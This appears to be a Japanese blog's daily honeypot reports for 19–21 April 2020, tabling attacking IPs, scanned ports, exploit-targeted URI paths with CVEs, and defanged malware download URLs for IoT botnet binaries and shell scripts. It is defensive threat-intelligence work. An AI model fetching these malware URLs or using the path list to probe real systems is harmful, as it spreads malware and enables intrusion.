Port 1433

IP Country Count AbuseIPDB
202[.]1[.]114[.]202 Philippines 62551 件 Link
221[.]215[.]205[.]122 China 58416 件 Link
61[.]0[.]245[.]235 India 55666 件 Link
185[.]229[.]9[.]135 Russia 54386 件 Link
106[.]3[.]43[.]25 China 48558 件 Link
115[.]75[.]48[.]138 Vietnam 42513 件 Link
183[.]131[.]85[.]18 China 21598 件 Link
36[.]76[.]7[.]130 Indonesia 19114 件 Link
160[.]202[.]65[.]90 United States 15887 件 Link
36[.]78[.]201[.]226 Indonesia 14087 件 Link
95[.]133[.]251[.]68 Ukraine 7874 件 Link
93[.]80[.]138[.]254 Russia 7054 件 Link
116[.]232[.]155[.]70 China 5696 件 Link
170[.]80[.]181[.]138 Brazil 3865 件 Link
195[.]88[.]193[.]15 Russia 2838 件 Link
41[.]65[.]146[.]162 Egypt 2167 件 Link
197[.]45[.]67[.]99 Egypt 1548 件 Link
115[.]201[.]149[.]139 China 914 件 Link
115[.]201[.]148[.]18 China 889 件 Link
60[.]162[.]59[.]76 China 522 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/21)

タイから1万件近いRDPへの通信を検知してました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 329558 件
3391 SAVANT 8427 件
3390 Distributed Service Coordinator 3692 件
22 The Secure Shell (SSH) Protocol 1772 件
445 Microsoft-DS 1705 件
5001 Unknown 89 件
3389 MS WBT Server 82 件
2001 Unknown 74 件
4911 Unknown 72 件
52869 Realtek SDK miniigd SOAP Service 55 件
8291 Unknown 44 件
8080 HTTP Alternate (see port 80) 42 件
5555 Android Debug Bridge 40 件
5672 AMQP 38 件
9527 Unknown 37 件
81 Unknown 35 件
5222 XMPP Client Connection 33 件
5432 PostgreSQL Database 33 件
5984 CouchDB 30 件
8088 Radan HTTP 22 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
183[.]131[.]85[.]18 China 68141 件 Link
115[.]75[.]48[.]138 Vietnam 38075 件 Link
185[.]229[.]9[.]135 Russia 35302 件 Link
221[.]215[.]205[.]122 China 26690 件 Link
106[.]3[.]43[.]25 China 23239 件 Link
45[.]141[.]87[.]27 Russia 22792 件 Link
45[.]112[.]54[.]146 India 22158 件 Link
93[.]81[.]205[.]42 Russia 22153 件 Link
170[.]80[.]181[.]138 Brazil 19412 件 Link
43[.]231[.]62[.]86 Pakistan 16406 件 Link
185[.]202[.]1[.]19 France 11068 件 Link
60[.]170[.]0[.]30 China 9597 件 Link
27[.]254[.]207[.]47 Thailand 9448 件 Link
112[.]115[.]227[.]213 China 8019 件 Link
125[.]132[.]176[.]126 South Korea 7516 件 Link
1[.]55[.]226[.]68 Vietnam 6216 件 Link
60[.]170[.]0[.]6 China 6122 件 Link
198[.]108[.]67[.]48 United States 5802 件 Link
14[.]249[.]158[.]244 Vietnam 4890 件 Link
190[.]203[.]255[.]231 Venezuela 3305 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 27 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
125[.]212[.]217[.]214 Vietnam 5 件 Link
177[.]139[.]171[.]190 Brazil 2 件 Link
80[.]24[.]44[.]11 Spain 1 件 Link
192[.]241[.]238[.]154 United States 1 件 Link
89[.]40[.]73[.]87 Romania 1 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
51[.]38[.]57[.]199 France 1 件 Link
45[.]238[.]208[.]3 Brazil 1 件 Link
45[.]148[.]10[.]72 Netherlands 1 件 Link
45[.]176[.]125[.]41 Brazil 1 件 Link
46[.]2[.]240[.]152 Turkey 1 件 Link
185[.]216[.]140[.]6 Netherlands 1 件 Link
80[.]82[.]78[.]104 Netherlands 1 件 Link
162[.]243[.]129[.]170 United States 1 件 Link
178[.]93[.]17[.]210 Ukraine 1 件 Link
196[.]52[.]43[.]59 South Africa 1 件 Link
206[.]192[.]81[.]22 United States 1 件 Link
193[.]242[.]212[.]101 Poland 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
45[.]146[.]253[.]35 Germany 27 件 Link
77[.]247[.]108[.]119 Estonia 7 件 Link
125[.]212[.]217[.]214 Vietnam 5 件 Link
177[.]139[.]171[.]190 Brazil 2 件 Link
80[.]24[.]44[.]11 Spain 1 件 Link
192[.]241[.]238[.]154 United States 1 件 Link
89[.]40[.]73[.]87 Romania 1 件 Link
45[.]13[.]93[.]90 Germany 1 件 Link
51[.]38[.]57[.]199 France 1 件 Link
45[.]238[.]208[.]3 Brazil 1 件 Link
45[.]148[.]10[.]72 Netherlands 1 件 Link
45[.]176[.]125[.]41 Brazil 1 件 Link
46[.]2[.]240[.]152 Turkey 1 件 Link
185[.]216[.]140[.]6 Netherlands 1 件 Link
80[.]82[.]78[.]104 Netherlands 1 件 Link
162[.]243[.]129[.]170 United States 1 件 Link
178[.]93[.]17[.]210 Ukraine 1 件 Link
196[.]52[.]43[.]59 South Africa 1 件 Link
206[.]192[.]81[.]22 United States 1 件 Link
193[.]242[.]212[.]101 Poland 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 CNM SecuManager - -
/_ping Unknown - -
/PSBlock Supermicro IPMI - -
/apply_sec[.]cgi D-Link WiFi Router CVE-2019-16920 -
/v1[.]40/containers/json Docker Engine API, - -
/public/hydra[.]php Webshell - -

02 WOWHoneypot

URI Path Target CVE Memo
//wp-content/plugins/apikey/apikey[.]php Wordpress - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 389952 件
/ - - 2297 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 55 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 16 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 15 件
/cgi CGI - 14 件
login[.]cgi D-Link Router - 9 件
sip:nm Session Initiation Protocol - 8 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 New - 7 件
/nice - - 7 件
/manager/html Apache Tomcat Manager - 5 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 5 件
/shell MVPower DVR - 5 件
/admin/assets/js/views/login[.]js FreePBX - 4 件
/version - - 3 件
/jmx JMX - 3 件
hxxp://example[.]com/ Unauthorized relay - 2 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 2 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 2 件
/server-info Apache - 2 件
/_ping New - 2 件
/public/index[.]php - - 2 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 1 件
/manager/text/list Apache Tomcat Manager - 1 件
hxxp://www[.]baidu[.]com/ Unauthorized relay - 1 件
hxxp://www[.]bgex[.]com/ Unauthorized relay - 1 件
/PSBlock New - 1 件
/solr/admin/cores Apache Solr - 1 件
/_search Elasticsearch - 1 件
/solr/admin/info/system Apache Solr - 1 件
/apply_sec[.]cgi New - 1 件
/json_rpc JSON-RPC - 1 件
/hudson Unknown - 1 件
hxxp://chek[.]zennolab[.]com/proxy[.]php Unauthorized relay - 1 件
/jars Unknown - 1 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/admin-scripts[.]asp Administrator - 1 件
/v1[.]40/containers/json New - 1 件
rtsp://160[.]16[.]145[.]183:554/ Real Time Streaming Protocol - 1 件
/v2/stats/self ETCD API - 1 件
/info - - 1 件
/public/hydra[.]php New - 1 件
SERVER - - 1 件
/tmUnblock[.]cgi Linksys E-series - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
/_cat/indices Elasticsearch - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 21 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 21 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 13 件
/admin/assets/js/views/login[.]js FreePBX - 7 件
ip[.]ws[.]126[.]net:443 Unauthorized Relay - 2 件
/manager/html Apache Tomcat Manager - 1 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 1 件
/pma/scripts/setup[.]php phpMyAdmin - 1 件
/mysql/scripts/setup[.]php MySQL - 1 件
/myadmin/scripts/setup[.]php Administrator - 1 件
/sqladmin/scripts/setup[.]php SQLAdmin - 1 件
/db/scripts/setup[.]php Database - 1 件
hxxp://example[.]com/ Unauthorized relay - 1 件
/hudson Unknown - 1 件
/robots[.]txt robots.txt - 1 件
/sitemap[.]xml XML sitemap - 1 件
/[.]well-known/security[.]txt Hidden files - 1 件
/favicon[.]ico favicon - 1 件
/boaform/admin/formPing Administrator - 1 件
//wp-content/plugins/apikey/apikey[.]php New - 1 件
/portal/redlion Unknown - 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 6 件
/ - - 6 件
/data[.]php - - 1 件
/ajax - - 1 件
/owa/auth/logon[.]aspx Microsoft Exchange Server CVE-2018-16793 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 392388 件
hxxp://178[.]33[.]64[.]107/arm7 13 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 12 件
hxxp://51[.]178[.]81[.]75/mips 11 件
hxxp://176[.]123[.]3[.]96/arm7 5 件
hxxp://80[.]211[.]230[.]27:1691/dvrbot[.]arm7 3 件
hxxp://fid[.]hognoob[.]se/download[.]exe 2 件
hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 1 件
hxxp://37[.]49[.]226[.]43/infect 1 件
hxxp://19ce033f[.]ngrok[.]io/arm7 1 件
hxxp://185[.]172[.]110[.]232/Cloud[.]mips 1 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://212[.]114[.]52[.]128/arm7 1 件
hxxp://51[.]222[.]0[.]40/bins/mpsl 1 件
hxxp://178[.]32[.]148[.]5/arm7 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3391 27[.]254[.]207[.]47 Thailand 7090 件 Link
3390 27[.]254[.]207[.]47 Thailand 2358 件 Link
3391 209[.]45[.]61[.]241 Peru 1321 件 Link
3390 209[.]45[.]61[.]241 Peru 1319 件 Link
29497 45[.]141[.]87[.]27 Russia 8 件 Link
17532 45[.]141[.]87[.]27 Russia 8 件 Link
19542 45[.]141[.]87[.]27 Russia 8 件 Link
18584 45[.]141[.]87[.]27 Russia 8 件 Link
18952 45[.]141[.]87[.]27 Russia 8 件 Link
28169 45[.]141[.]87[.]27 Russia 8 件 Link
22221 45[.]141[.]87[.]27 Russia 8 件 Link
22046 45[.]141[.]87[.]27 Russia 8 件 Link
17607 45[.]141[.]87[.]27 Russia 8 件 Link
22541 45[.]141[.]87[.]27 Russia 8 件 Link
29753 45[.]141[.]87[.]27 Russia 8 件 Link
28069 45[.]141[.]87[.]27 Russia 8 件 Link
17854 45[.]141[.]87[.]27 Russia 8 件 Link
22850 45[.]141[.]87[.]27 Russia 8 件 Link
22863 45[.]141[.]87[.]27 Russia 8 件 Link
29572 45[.]141[.]87[.]27 Russia 8 件 Link

Port

Port Count
3391 8427 件
3390 3692 件
3389 65 件
3380 13 件
3392 12 件
3387 12 件
3384 12 件
22894 12 件
23489 12 件
23313 12 件
24351 12 件
23933 11 件
23195 11 件
18193 11 件
23266 11 件
17161 11 件
23333 11 件
18410 11 件
23320 11 件
24441 11 件

IP

IP Country Count AbuseIPDB
45[.]141[.]87[.]27 Russia 22792 件 Link
185[.]202[.]1[.]19 France 11068 件 Link
27[.]254[.]207[.]47 Thailand 9448 件 Link
209[.]45[.]61[.]241 Peru 2640 件 Link
185[.]202[.]1[.]189 France 1320 件 Link
185[.]202[.]2[.]120 France 1035 件 Link
185[.]202[.]1[.]85 France 889 件 Link
185[.]202[.]1[.]248 France 858 件 Link
185[.]202[.]1[.]10 France 797 件 Link
185[.]202[.]1[.]249 France 464 件 Link
185[.]202[.]1[.]188 France 173 件 Link
92[.]63[.]194[.]241 Russia 82 件 Link
92[.]63[.]194[.]21 Russia 79 件 Link
185[.]153[.]196[.]239 Russia 77 件 Link
185[.]153[.]199[.]87 Russia 74 件 Link
185[.]153[.]199[.]81 Russia 73 件 Link
79[.]124[.]62[.]38 Bulgaria 67 件 Link
185[.]202[.]1[.]36 France 52 件 Link
185[.]153[.]196[.]99 Russia 39 件 Link
185[.]202[.]2[.]149 France 29 件 Link

Port 1433

IP Country Count AbuseIPDB
183[.]131[.]85[.]18 China 68141 件 Link
115[.]75[.]48[.]138 Vietnam 38075 件 Link
185[.]229[.]9[.]135 Russia 35302 件 Link
221[.]215[.]205[.]122 China 26690 件 Link
106[.]3[.]43[.]25 China 23239 件 Link
45[.]112[.]54[.]146 India 22158 件 Link
93[.]81[.]205[.]42 Russia 22153 件 Link
170[.]80[.]181[.]138 Brazil 19412 件 Link
43[.]231[.]62[.]86 Pakistan 16406 件 Link
60[.]170[.]0[.]30 China 9597 件 Link
112[.]115[.]227[.]213 China 8019 件 Link
125[.]132[.]176[.]126 South Korea 7516 件 Link
1[.]55[.]226[.]68 Vietnam 6216 件 Link
60[.]170[.]0[.]6 China 6122 件 Link
14[.]249[.]158[.]244 Vietnam 4890 件 Link
190[.]203[.]255[.]231 Venezuela 3305 件 Link
27[.]5[.]198[.]48 India 3081 件 Link
80[.]210[.]36[.]62 Iran 2246 件 Link
27[.]79[.]183[.]53 Vietnam 1670 件 Link
201[.]210[.]93[.]82 Venezuela 1592 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/20)

HTTPSハニーポットに調査行為止まりの通信(RFCに記載されているもの)ではありますが、DNS over HTTPSの通信が来てました。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 511123 件
3391 SAVANT 4436 件
3390 Distributed Service Coordinator 2839 件
445 Microsoft-DS 1814 件
22 The Secure Shell (SSH) Protocol 1079 件
3389 MS WBT Server 155 件
1064 JSTEL 90 件
6646 Unknown 78 件
2967 SSC-AGENT 72 件
52869 Realtek SDK miniigd SOAP Service 53 件
3386 GPRS Data 48 件
102 ISO-TSAP Class 0 46 件
2082 Infowave Mobility Server 41 件
4991 VITA Radio Transport 40 件
8098 Unknown 40 件
123 Network Time Protocol 39 件
49 Login Host Protocol (TACACS) 39 件
4592 Reserved 39 件
81 Unknown 38 件
5001 Unknown 35 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
45[.]112[.]54[.]146 India 60295 件 Link
117[.]25[.]182[.]50 China 52290 件 Link
180[.]166[.]90[.]181 China 48784 件 Link
60[.]170[.]0[.]30 China 44919 件 Link
80[.]251[.]145[.]16 Russia 43663 件 Link
14[.]175[.]167[.]143 Vietnam 34832 件 Link
109[.]69[.]30[.]140 Russia 32851 件 Link
103[.]107[.]188[.]174 China 32252 件 Link
85[.]100[.]124[.]175 Turkey 24998 件 Link
60[.]170[.]0[.]6 China 24025 件 Link
78[.]186[.]173[.]61 Turkey 23801 件 Link
93[.]81[.]205[.]42 Russia 22159 件 Link
148[.]244[.]240[.]231 Mexico 20818 件 Link
185[.]202[.]1[.]19 France 12054 件 Link
160[.]202[.]146[.]216 Bangladesh 11441 件 Link
1[.]0[.]209[.]49 Thailand 9781 件 Link
185[.]220[.]38[.]253 Russia 8997 件 Link
36[.]91[.]43[.]18 Indonesia 6969 件 Link
209[.]45[.]61[.]241 Peru 4054 件 Link
45[.]141[.]87[.]2 Russia 3678 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 6 件 Link
41[.]179[.]253[.]229 Egypt 4 件 Link
5[.]232[.]248[.]52 Iran 2 件 Link
162[.]243[.]133[.]123 United States 1 件 Link
177[.]44[.]38[.]128 Brazil 1 件 Link
34[.]241[.]152[.]39 Ireland 1 件 Link
85[.]99[.]128[.]15 Turkey 1 件 Link
89[.]40[.]73[.]127 Romania 1 件 Link
162[.]243[.]131[.]84 United States 1 件 Link
80[.]82[.]78[.]104 Netherlands 1 件 Link
162[.]243[.]131[.]175 United States 1 件 Link
164[.]68[.]112[.]178 Germany 1 件 Link
209[.]45[.]60[.]60 Peru 1 件 Link
213[.]14[.]140[.]85 Turkey 1 件 Link
85[.]122[.]180[.]114 Romania 1 件 Link
183[.]131[.]110[.]114 China 1 件 Link
113[.]161[.]38[.]190 Vietnam 1 件 Link
5[.]235[.]236[.]212 Iran 1 件 Link
180[.]249[.]180[.]155 Indonesia 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 6 件 Link
41[.]179[.]253[.]229 Egypt 4 件 Link
5[.]232[.]248[.]52 Iran 2 件 Link
162[.]243[.]133[.]123 United States 1 件 Link
177[.]44[.]38[.]128 Brazil 1 件 Link
34[.]241[.]152[.]39 Ireland 1 件 Link
85[.]99[.]128[.]15 Turkey 1 件 Link
89[.]40[.]73[.]127 Romania 1 件 Link
162[.]243[.]131[.]84 United States 1 件 Link
80[.]82[.]78[.]104 Netherlands 1 件 Link
162[.]243[.]131[.]175 United States 1 件 Link
164[.]68[.]112[.]178 Germany 1 件 Link
209[.]45[.]60[.]60 Peru 1 件 Link
213[.]14[.]140[.]85 Turkey 1 件 Link
85[.]122[.]180[.]114 Romania 1 件 Link
183[.]131[.]110[.]114 China 1 件 Link
113[.]161[.]38[.]190 Vietnam 1 件 Link
5[.]235[.]236[.]212 Iran 1 件 Link
180[.]249[.]180[.]155 Indonesia 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/manager Apache Tomcat Manager - -
rtsp://160[.]16[.]145[.]183:8554/ Real Time Streaming Protocol - -
RTSP://160[.]16[.]145[.]183:554/ Real Time Streaming Protocol - -
/ws/v1/cluster Apache Hadoop - -

02 WOWHoneypot

URI Path Target CVE Memo
- - - -

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
/dns-query DNS over HTTPS - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 544199 件
/ - - 330 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 53 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 22 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 14 件
/nice - - 13 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 13 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 13 件
sip:nm Session Initiation Protocol - 12 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 12 件
login[.]cgi D-Link Router - 11 件
/shell MVPower DVR - 7 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 7 件
/cgi CGI - 7 件
/admin/assets/js/views/login[.]js FreePBX - 5 件
/ws/v1/cluster/apps/new-application Hadoop YARN ResourceManager - 5 件
/api api - 4 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 4 件
/version - - 4 件
/jmx JMX - 3 件
hxxp://example[.]com/ Unauthorized relay - 3 件
/manager/text/list Tomcat - 3 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 2 件
/server-info Apache - 2 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 2 件
SERVER - - 2 件
/securityRealm/user/admin/search/index Administrator - 1 件
/setup[.]cgi DGN1000 Netgear Router - 1 件
/hudson Unknown - 1 件
/manager New - 1 件
/status - 2020/2/15 1 件
/api/status[.]json api - 1 件
rtsp://160[.]16[.]145[.]183:8554/ New - 1 件
RTSP://160[.]16[.]145[.]183:554/ New - 1 件
/service/extdirect Sonatype Nexus Repository Manager CVE-2019-7238 1 件
/jars Unknown - 1 件
/ws/v1/cluster New - 1 件
/info - - 1 件
/stats - - 1 件
/db/manage/ Database - 1 件
sip:160[.]16[.]145[.]183 Session Initiation Protocol - 1 件

02 WOWHoneypot

URI Path Target CVE Count
/ - - 23 件
/admin/assets/js/views/login[.]js FreePBX - 8 件
/TP/public/index[.]php - - 3 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/hudson Unknown - 1 件
/solr/admin/info/system Apache Solr - 1 件
/index[.]php - - 1 件
/editBlackAndWhiteList DVR/NVR/IPC API - 1 件
/manager/text/list Tomcat - 1 件
/portal/redlion Unknown - 1 件
/cgi-bin/mainfunction[.]cgi DrayTek CVE-2020-8515 1 件

03 WOWHoneypot(SSL)

URI Path Target CVE Count
/admin/assets/js/views/login[.]js FreePBX - 8 件
/ - - 4 件
/vendor/phpunit/phpunit/src/Util/PHP/eva
l-stdin[.]php
 PHPUnit CVE-2017-9841 2 件
/cgi-bin/config[.]exp CGI - 1 件
/dns-query New - 1 件

Malware

  1. Honeytrap
Malware Count
No Malware 544732 件
hxxp://d[.]powerofwish[.]com/pm[.]sh 13 件
hxxp://194[.]180[.]224[.]137/mXy3uh[.]sh 7 件
hxxp://176[.]123[.]3[.]96/arm7 5 件
hxxp://51[.]178[.]81[.]75/mips 5 件
hxxp://92[.]222[.]70[.]178/SBIDIOT/mips 2 件
hxxp://178[.]32[.]148[.]5/arm7 1 件
hxxp://19ce033f[.]ngrok[.]io/arm7 1 件
hxxp://195[.]231[.]4[.]17/AB4g5/Omni[.]mips 1 件

RDP

Port/IP

Port IP Country Count AbuseIPDB
3391 27[.]254[.]207[.]47 Thailand 2394 件 Link
3391 209[.]45[.]61[.]241 Peru 2028 件 Link
3390 209[.]45[.]61[.]241 Peru 2026 件 Link
3390 27[.]254[.]207[.]47 Thailand 796 件 Link
3389 112[.]78[.]134[.]194 Indonesia 58 件 Link
3389 112[.]78[.]134[.]196 Indonesia 21 件 Link
3389 139[.]217[.]94[.]43 China 20 件 Link
3389 78[.]129[.]252[.]18 United Kingdom 9 件 Link
24867 185[.]202[.]1[.]189 France 6 件 Link
25447 185[.]202[.]1[.]189 France 6 件 Link
24209 185[.]202[.]1[.]189 France 6 件 Link
24106 185[.]202[.]1[.]189 France 6 件 Link
24858 185[.]202[.]1[.]189 France 6 件 Link
24550 185[.]202[.]1[.]189 France 6 件 Link
24886 185[.]202[.]1[.]189 France 6 件 Link
5939 185[.]202[.]1[.]189 France 6 件 Link
25613 185[.]202[.]1[.]189 France 6 件 Link
25042 185[.]202[.]1[.]189 France 6 件 Link
24347 185[.]202[.]1[.]189 France 6 件 Link
24342 185[.]202[.]1[.]189 France 6 件 Link

Port

Port Count
3391 4434 件
3390 2836 件
3389 150 件
24470 11 件
3395 11 件
3386 11 件
3388 11 件
24948 10 件
24894 10 件
24396 10 件
24260 10 件
3392 10 件
24156 9 件
24444 9 件
24026 9 件
25565 9 件
24635 9 件
24403 9 件
3396 9 件
24490 9 件

IP

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 12054 件 Link
209[.]45[.]61[.]241 Peru 4054 件 Link
185[.]202[.]1[.]189 France 3497 件 Link
27[.]254[.]207[.]47 Thailand 3190 件 Link
185[.]202[.]2[.]120 France 825 件 Link
185[.]202[.]1[.]10 France 809 件 Link
194[.]61[.]26[.]5 Netherlands 294 件 Link
5[.]101[.]64[.]77 Russia 81 件 Link
185[.]202[.]1[.]85 France 78 件 Link
112[.]78[.]134[.]194 Indonesia 58 件 Link
185[.]202[.]1[.]248 France 55 件 Link
185[.]202[.]0[.]27 United Kingdom 45 件 Link
185[.]202[.]2[.]149 France 25 件 Link
112[.]78[.]134[.]196 Indonesia 21 件 Link
139[.]217[.]94[.]43 China 20 件 Link
194[.]28[.]112[.]49 Netherlands 19 件 Link
185[.]202[.]1[.]249 France 17 件 Link
185[.]153[.]196[.]99 Russia 16 件 Link
185[.]202[.]1[.]43 France 13 件 Link
185[.]153[.]199[.]12 Russia 12 件 Link

Port 1433

IP Country Count AbuseIPDB
45[.]112[.]54[.]146 India 60295 件 Link
117[.]25[.]182[.]50 China 52290 件 Link
180[.]166[.]90[.]181 China 48784 件 Link
60[.]170[.]0[.]30 China 44919 件 Link
80[.]251[.]145[.]16 Russia 43663 件 Link
14[.]175[.]167[.]143 Vietnam 34832 件 Link
109[.]69[.]30[.]140 Russia 32851 件 Link
103[.]107[.]188[.]174 China 32252 件 Link
85[.]100[.]124[.]175 Turkey 24998 件 Link
60[.]170[.]0[.]6 China 24025 件 Link
78[.]186[.]173[.]61 Turkey 23801 件 Link
93[.]81[.]205[.]42 Russia 22159 件 Link
148[.]244[.]240[.]231 Mexico 20818 件 Link
160[.]202[.]146[.]216 Bangladesh 11441 件 Link
1[.]0[.]209[.]49 Thailand 9781 件 Link
185[.]220[.]38[.]253 Russia 8997 件 Link
36[.]91[.]43[.]18 Indonesia 6969 件 Link
2[.]92[.]204[.]223 Russia 2436 件 Link
113[.]245[.]53[.]242 China 1369 件 Link
36[.]90[.]88[.]8 Indonesia 1161 件 Link

【ハニーポット簡易分析】Honeypot簡易分析(2020/4/19)

特に新たな脆弱性や気になるHTTPリクエストはなかったですが、フランスのIPからRDPへの通信を多数検知(11644件)。3389宛ではなく、複数ポートに対しての通信であったため、どこかのポートでRDPを利用していないか調査しているっぽいです。

Port(TOP20)

  1. Honeytrap
Port Service Count
1433 Microsoft-SQL-Server 603626 件
445 Microsoft-DS 1577 件
3390 Distributed Service Coordinator 179 件
3391 SAVANT 178 件
9527 Unknown 117 件
3389 MS WBT Server 84 件
5050 multimedia conference control tool 84 件
22 The Secure Shell (SSH) Protocol 82 件
37 Time 72 件
427 Server Location 71 件
7071 IWGADTS Aircraft Housekeeping Message 55 件
52869 Realtek SDK miniigd SOAP Service 50 件
8090 Vehicle to station messaging 42 件
554 Real Time Streaming Protocol (RTSP) 41 件
9051 Fusion-io Central Manager Service 40 件
138 NETBIOS Datagram Service 39 件
1110 Start web admin server 39 件
902 self documenting Telnet Door 39 件
2067 Data Link Switch Write Port Number 39 件
1604 icabrowser 39 件

IP(TOP20)

01 Honeytrap

IP Country Count AbuseIPDB
103[.]107[.]188[.]174 China 54545 件 Link
118[.]69[.]40[.]251 Vietnam 50209 件 Link
80[.]251[.]145[.]16 Russia 46026 件 Link
180[.]166[.]90[.]181 China 40891 件 Link
117[.]25[.]182[.]50 China 37388 件 Link
78[.]186[.]173[.]61 Turkey 36104 件 Link
148[.]244[.]240[.]231 Mexico 34086 件 Link
14[.]175[.]167[.]143 Vietnam 32212 件 Link
85[.]100[.]124[.]175 Turkey 29789 件 Link
190[.]115[.]3[.]171 Guatemala 26811 件 Link
46[.]31[.]34[.]41 Poland 25943 件 Link
173[.]95[.]47[.]227 United States 21357 件 Link
212[.]77[.]151[.]229 Russia 20319 件 Link
80[.]69[.]180[.]108 Russia 19202 件 Link
93[.]81[.]205[.]42 Russia 18471 件 Link
109[.]69[.]30[.]140 Russia 18171 件 Link
179[.]157[.]67[.]122 Brazil 16457 件 Link
112[.]8[.]251[.]198 China 12819 件 Link
113[.]245[.]53[.]242 China 12562 件 Link
116[.]105[.]140[.]122 Vietnam 11969 件 Link

02 WOWHoneypot

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 6 件 Link
77[.]247[.]109[.]87 Estonia 3 件 Link
64[.]233[.]172[.]191 United States 2 件 Link
181[.]210[.]65[.]91 Honduras 2 件 Link
89[.]38[.]190[.]54 Iran 1 件 Link
162[.]243[.]131[.]175 United States 1 件 Link
104[.]191[.]250[.]56 United States 1 件 Link
178[.]237[.]188[.]51 Russia 1 件 Link
24[.]60[.]100[.]32 United States 1 件 Link
143[.]202[.]189[.]237 Brazil 1 件 Link
45[.]224[.]95[.]6 Brazil 1 件 Link
179[.]96[.]183[.]205 Brazil 1 件 Link
139[.]162[.]106[.]181 Japan 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link
89[.]40[.]73[.]79 Romania 1 件 Link
220[.]233[.]114[.]66 Australia 1 件 Link
212[.]107[.]224[.]141 Russia 1 件 Link
185[.]232[.]65[.]227 Romania 1 件 Link
49[.]233[.]180[.]152 China 1 件 Link

03 WOWHoneypot(SSL)

IP Country Count AbuseIPDB
77[.]247[.]108[.]119 Estonia 8 件 Link
5[.]101[.]0[.]209 Russia 6 件 Link
77[.]247[.]109[.]87 Estonia 3 件 Link
64[.]233[.]172[.]191 United States 2 件 Link
181[.]210[.]65[.]91 Honduras 2 件 Link
89[.]38[.]190[.]54 Iran 1 件 Link
162[.]243[.]131[.]175 United States 1 件 Link
104[.]191[.]250[.]56 United States 1 件 Link
178[.]237[.]188[.]51 Russia 1 件 Link
24[.]60[.]100[.]32 United States 1 件 Link
143[.]202[.]189[.]237 Brazil 1 件 Link
45[.]224[.]95[.]6 Brazil 1 件 Link
179[.]96[.]183[.]205 Brazil 1 件 Link
139[.]162[.]106[.]181 Japan 1 件 Link
45[.]13[.]93[.]82 Germany 1 件 Link
89[.]40[.]73[.]79 Romania 1 件 Link
220[.]233[.]114[.]66 Australia 1 件 Link
212[.]107[.]224[.]141 Russia 1 件 Link
185[.]232[.]65[.]227 Romania 1 件 Link
49[.]233[.]180[.]152 China 1 件 Link

URI Path

NEW URI Path

01 Honeytrap

URI Path Target CVE Memo
/_ping
/v1[.]40/containers/json

02 WOWHoneypot

URI Path Target CVE Memo
/YVMa

03 WOWHoneypot(SSL)

URI Path Target CVE Memo
- - - -

URI Path

01 Honeytrap

URI Path Target CVE Count
No uri path - - 622610 件
/ - - 323 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 47 件
sip:nm Session Initiation Protocol - 17 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 16 件
/nice - - 15 件
login[.]cgi D-Link Router - 12 件
/cgi CGI - 9 件
/version - - 7 件
